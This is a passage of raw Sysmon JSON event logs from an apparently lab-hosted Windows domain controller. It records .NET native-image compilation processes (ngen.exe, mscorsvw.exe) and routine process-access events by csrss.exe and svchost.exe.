05:58:33.089","ProcessGuid":"{A837DB8D-0487-5F25-0000-0010CA630D00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1170-0\\Microsoft.CSharp.dll","CreationUtcTime":"2020-08-01 05:58:33.089","EventReceivedTime":"2020-08-01 05:58:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6803,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:33.136\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0489-5F25-0000-0010E8670D00}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:33.136","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0489-5F25-0000-0010E8670D00}","TargetProcessId":"3088","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6804,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:33.136\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0489-5F25-0000-0010E8670D00}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:33.136","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0489-5F25-0000-0010E8670D00}","TargetProcessId":"3088","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6805,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:33.152\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0489-5F25-0000-0010E8670D00}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:33.152","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0489-5F25-0000-0010E8670D00}","TargetProcessId":"3088","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6806,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:33.183\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0489-5F25-0000-0010AE6B0D00}\r\nTargetProcessId: 2984\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:33.183","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0489-5F25-0000-0010AE6B0D00}","TargetProcessId":"2984","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6807,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:33.183\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0489-5F25-0000-0010AE6B0D00}\r\nTargetProcessId: 2984\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:33.183","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0489-5F25-0000-0010AE6B0D00}","TargetProcessId":"2984","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6808,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:33.199\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0489-5F25-0000-0010AE6B0D00}\r\nTargetProcessId: 2984\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:33.199","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0489-5F25-0000-0010AE6B0D00}","TargetProcessId":"2984","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6809,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:33.246\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0489-5F25-0000-0010476F0D00}\r\nTargetProcessId: 3104\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:33.246","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0489-5F25-0000-0010476F0D00}","TargetProcessId":"3104","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6810,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:33.246\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: 